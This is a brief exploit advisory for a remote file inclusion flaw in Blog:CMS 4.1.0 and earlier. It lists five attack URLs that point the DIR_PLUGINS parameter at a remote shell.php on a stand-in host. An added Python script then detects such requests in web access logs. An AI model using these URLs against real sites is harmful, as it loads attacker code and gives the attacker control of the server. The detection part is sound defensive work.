Blog:CMS <= 4.1.0 Remote File Inclusion

Bug found by Drago84, ToxiC CreW

Vendor site: http://blogcms.com/

Pages affected:

index.php
media.php
archive.php
archives.php
blog.php

The problem is:

include($DIR_PLUGINS."related/nusoap.php");

Expl:

http://www.sito.com/dir_blogccms/index.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/admin/media.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/archive.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/archives.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/blog.php?DIR_PLUGINS=http://evalsite.com/shell.php?
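
Detection example added here, not part of the original advisory: it scans web access logs for requests that pass DIR_PLUGINS in the query string, using the script names listed above. The log format (common/combined), the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names and parameter name taken from the advisory.
AFFECTED = {"index.php", "media.php", "archive.php", "archives.php", "blog.php"}
PARAM = "DIR_PLUGINS"

# Assumed input: Apache/nginx common or combined access-log lines.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
URL_LIKE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # scheme://... or //host

def classify(line):
    """Return a finding dict if the request carries DIR_PLUGINS, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes, so http%3A%2F%2F... is seen as http://...
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    script = parts.path.rsplit("/", 1)[-1]
    remote = any(URL_LIKE.match(v) for v in values)
    # A URL value aimed at a listed script matches the advisory exactly;
    # any other use of the parameter is still worth a look.
    severity = "high" if remote and script in AFFECTED else "medium"
    return {"client": client, "script": script, "status": int(status),
            "value": values[0], "severity": severity}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /blog/index.php?DIR_PLUGINS=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /blog/extras/fancyurls/archive.php?DIR_PLUGINS=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 128',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /blog/index.php?blogid=1 HTTP/1.1" 200 9000',
    '198.51.100.8 - - [01/Jan/2024:10:02:00 +0000] "GET /blog/admin/media.php?DIR_PLUGINS=plugins/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["severity"], f["client"], f["script"], f["status"], f["value"])
```

An access log records only the request line, so this covers the query-string form shown in the advisory.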